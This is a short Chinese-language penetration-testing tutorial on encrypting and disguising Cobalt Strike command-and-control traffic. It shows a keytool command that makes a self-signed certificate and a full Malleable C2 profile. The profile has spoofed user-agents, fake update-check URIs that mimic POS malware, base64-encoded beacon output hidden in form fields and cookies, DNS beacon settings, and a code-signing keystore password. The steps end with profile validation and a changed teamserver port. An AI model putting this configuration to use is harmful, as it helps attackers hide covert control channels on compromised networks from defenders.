【内网渗透】cobaltstrike流量加密

cobaltstrike流量加密

生成免费的ssl证书
keytool -genkey -alias sanss -keyalg RSA -validity 36500 -keystore sanss.store
sanss sanss.store 这两个字符串都要记住，因为修改profile要使用填写相关的地区信息，这些信息填写后再profile上还要使用

填写完最后选择y会生成一个文件
放到cobaltstrike目录下

创建profile文件写入如下

set sample_name "moonsec POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101
Firefox/24.0";
#设置证书
https-certificate {
set CN "sanss";
set O "sanss";
set C "sanss";
set L "sanss";
set OU "sanss";
set ST "sanss";
set validity "365";
}#设置
code-signer{
set keystore "sanss.store";
set password "abcd1234.";
set alias "sanss";
}#指定 DNS beacon 不用的时候指定到 IP 地址
set dns_idle "8.8.4.4";
#每个单独 DNS 请求前强制睡眠时间
set dns_sleep "0";
#通过 DNS 上载数据时主机名的最大长度[0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php
/windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urlencoded";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @
PC&wv=11&gr=backoff&bv=1.55&data=";
print;
} }
server {
output {
print;
} } }
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
} }
server {
header "Content-Type" "text/plain";
output {
base64;
print;
} } }

把这里修改一下，修改成自己生成的

测试证书是否可用
./c2lint sanss.profile


再修改teamserver默认端口

之后启动带上证书就可以了